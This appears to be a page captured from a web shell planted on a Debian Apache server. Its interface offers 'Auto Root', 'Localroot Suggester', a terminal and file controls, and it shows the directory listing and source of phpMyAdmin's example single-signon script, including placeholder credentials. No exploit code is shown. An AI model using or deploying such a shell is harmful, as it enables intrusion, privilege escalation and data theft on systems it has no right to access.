Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
phpmyadmin /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
config.manyhosts.inc.php
1.99
KB
-rw-r--r--
2023-02-07 21:35
config.sample.inc.php
4.7
KB
-rw-r--r--
2023-02-07 21:35
create_tables.sql
10.69
KB
-rw-r--r--
2023-02-07 21:35
openid.php
4.43
KB
-rw-r--r--
2023-02-07 21:35
signon-script.php
796
B
-rw-r--r--
2023-02-07 21:35
signon.php
2.56
KB
-rw-r--r--
2023-02-07 21:35
Save
Rename
<?php /** * Single signon for phpMyAdmin * * This is just example how to use script based single signon with * phpMyAdmin, it is not intended to be perfect code and look, only * shows how you can integrate this functionality in your application. */ declare(strict_types=1); // phpcs:disable Squiz.Functions.GlobalFunction /** * This function returns username and password. * * It can optionally use configured username as parameter. * * @param string $user User name * * @return array */ function get_login_credentials($user) { /* Optionally we can use passed username */ if (! empty($user)) { return [ $user, 'password', ]; } /* Here we would retrieve the credentials */ return [ 'root', '', ]; }